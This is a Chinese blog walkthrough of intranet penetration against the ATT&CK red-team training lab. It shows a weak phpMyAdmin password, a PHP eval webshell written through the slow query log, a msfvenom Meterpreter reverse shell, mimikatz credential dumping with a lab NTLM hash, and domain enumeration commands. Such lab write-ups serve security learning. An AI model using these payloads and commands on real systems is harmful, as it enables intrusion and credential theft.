内网横向渗透 之 ATT&CK系列一 之 信息收集

前言

靶机下载地址:ATT&CK

拓扑图:

 

 

 通过模拟真实环境搭建的漏洞靶场,完全模拟ATK&CK攻击链路进行搭建,形成完整个闭环。虚拟机默认密码为hongrisec@2019。


 环境搭建

名字 host password 说明
win7 192.168.200.129/24
192.168.52.143/24
hongrisec@2019 web服务器
win2K3 192.168.52.141/24 hongrisec@2019 域成员
windows server 2008 r2 192.168.52.138/24 hongrisec@2019 域控制器
kali 192.168.200.128/24 kali attack

 

设置VMnet1为仅主机模式,然后win7设置双网卡,其中有一张为Net,如下设置,不然ip会对不上:

win2K3和windows server 2008 R2的网卡设置如下:

 

 攻击机 kali 的网卡设置如下:

 


 测试网络连通性

我个人感觉,其实没必要可以去ping吧~我这基本上ping不通(因为我开了防火墙),下面是关闭防火墙后的ping

win7 ping win2K3

 

 win7 ping windows server 2008 r2

 

 win2K3 ping windows server 2008 r2

 

同样的道理进行 windows server 2008 r2 反ping win7,win2K3,win7和kali 互通。

win7开了防火墙后,kali ping不通,但是nmap能扫出来,无法访问80端口,为了继续渗透,作者我决定对win7的防火墙做些手脚,如下:

入网规则:

出网规则:

注意,我靶机win7的防火墙还是开着的:

 

具体怎么设置呢,自行百度吧,设置出入网规则不是这篇博客的重点!


 内网渗透

信息收集

信息收集前要在win7中把phpstudy打开哦,位置是:c盘根目录下,各位师傅也可以自行设置开机自启动哈~

扫描同网段下的存活主机和端口

有人会问,怎么知道ip?linux下查看本机ip地址的命令是:ifconfig

nmap 192.168.200.0/24

可以看到开了个80端口,我们访问一下80端口

 

 发现是个phpStudy探针,基本信息都已经给了,就剩下目录了,那就进行目录扫描吧

dirb http://192.168.200.129/ /usr/share/wordlists/dirb/common.txt

扫完目录后发现除了个sql管理工具:phpMyadmin,其他啥也没,直接访问

 

漏洞一:弱口令

需要用户名密码,这个时候不要慌,回去phpStudy探针的那个页面走一波弱口令,什么你不知道phpStudy可以进行sql连接测试??那就往下看吧~

 

 

 来吧,弱口令走一波,先来个常用的 root root。

 

 回到phpMyadmin界面,输入刚才检测的用户名密码,登录成功。

 漏洞二:phpMyadmin慢查询日志getshell

phpMyadmin有很多中getshell方式,我这里使用慢查询日志来getshell,其他的方法自行百度,或者关注我 (敬请期待)

直接点击SQL即可

 

 

1、查看当前慢日志目录

show variables like '%slow%';

 此时的慢查询日志还是关闭状态。

2、开启慢查询日志功能:

set global slow_query_log=on;

 3、重新设置日志路径

日志路径可以在phpStudy探针中拿到,这里就不加说明了。(这里的php名字自行命名哈)

set global slow_query_log_file='C:/phpStudy/WWW/xx.php';

 修改成功,如果路径不对的话会报错的哦。

4、执行sql命令,写webshell进日志文件
注意执行的sql语句有一个sleep的延时时间,我这里设置为10s,为什么要加这个延时呢?因为咱们是通过慢查询来getshell的,所以要加延时。

select '<?php eval($_POST[cmd]);?>' from mysql.db where sleep(10);

 其中 <?php eval($_POST[cmd]);?> 是一句话,有不懂的师傅自行百度哦~这里不解释。

5、蚁剑连接

 

 测试连接,提示连接成功时,点击添加即可。

这样就拿到了webshell了。

发现里面有一个cms,我好像绕过了些啥,直接就进来了,这个cms在下一篇文章写吧!

下面是信息收集,作者使用msf反弹shell来进行:

生成木马:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.200.128 lport=10173 -f exe > spmonkey.exe

lhost 是kali ip地址,lport 是kali监听的端口

生成后利用蚁剑上传并执行,msf配置如下:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.200.128
set lport 10173
run

木马文件被执行后,反弹shell

查看当前权限:getuid

信息收集一:系统信息收集

sysinfo

信息收集二:网络信息收集

查看它有没有其他网段:run get_local_subnets

发现就只有52网段和200网段,对52网段进行存活主机收集:

创建路由规则:run autoroute ‐s 192.168.52.0/24

 

查看路由规则是否创建成功:run autoroute -p

信息收集三:win7(跳板机)的用户名和密码收集

上github下载mimikatz并上传至win7(实战中要做免杀哦)

wget https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210810-2/mimikatz_trunk.zip    # 命令下载

upload /opt/mimikatz/x64/mimikatz.exe C:\\phpStudy\\WWW\\  # 上传mimikatz到win7

上传成功了,回到msf上运行mimikatz,获取win7的密码

乱码??不要慌,运行 chcp 65001 就好了

进入mimikatz.exe所在的目录下执行mimikatz.exe,然后输入以下命令进行明文密抓取

privilege::debug
sekurlsa::logonPasswords

得到username : Administrator domain : GOD password : hongrisec@2022(因为登陆域控机win2008的时候会要求改密码,我这个改成hongrisec@2022)

LM:edea194d76c77d87923b4276177762ae;NTLM:8c535a2d84c3b21059d667639bb89db5(可能会用到哈希传递攻击,所以记录下来)

发现存在域后,使用post/windows/gather/enum_domains扫描找到域控用户 OWA

信息收集四:获取主机所安装的软件信息

run post/windows/gather/enum_applications

可以看到,目标主机安装了Nmap。

查看进程

meterpreter > ps

将木马进程迁移到explorer.exe上

migrate 2100

 

信息收集五:域环境信息+找到域控

进入shell界面收集域内信息:

收集域信息

ipconfig /all   查看本机ip,所在域
route print     打印路由信息
net view        查看局域网内其他主机名
arp -a          查看arp缓存
net start       查看开启了哪些服务
net share       查看开启了哪些共享
net share ipc$  开启ipc共享
net share c$    开启c盘共享
net use \\192.168.xx.xx\ipc$ "" /user:""   与192.168.xx.xx建立空连接
net use \\192.168.xx.xx\c$ "密码" /user:"用户名"  建立c盘共享
dir \\192.168.xx.xx\c$\user    查看192.168.xx.xx c盘user目录下的文件  
net config Workstation   查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user                 查看本机用户列表
net time /domain        #查看时间服务器,判断主域,主域服务器都做时间服务器
net user /domain         查看域用户
net localgroup administrators   查看本地管理员组(通常会有域用户)
net view /domain         查看有几个域
net user 用户名 /domain   获取指定域用户的信息
net group /domain        查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain    查看域中某工作组
net group "domain admins" /domain  查看域管理员的名字
net group "domain computers" /domain  查看域中的其他主机名
net group "doamin controllers" /domain  查看域控制器(可能有多台)

查看本机ip,所在域

ipconfig /all

查看局域网内其他主机名

net view

查看所开启的共享

net share

查看本机的用户信息

net user

获取主机名

use auxiliary/scanner/netbios/nbname
set RHOSTS 192.168.52.1/24
run

整理

域:god.org

域控 windows server 2008:OWA,192.168.52.138

域成员 windows server 2003:ROOT-TVI862UBEH,192.168.52.141

win7内网ip:192.168.52.143

 

posted @ 2022-03-27 21:08  spmonkey  阅读(353)  评论(0编辑  收藏  举报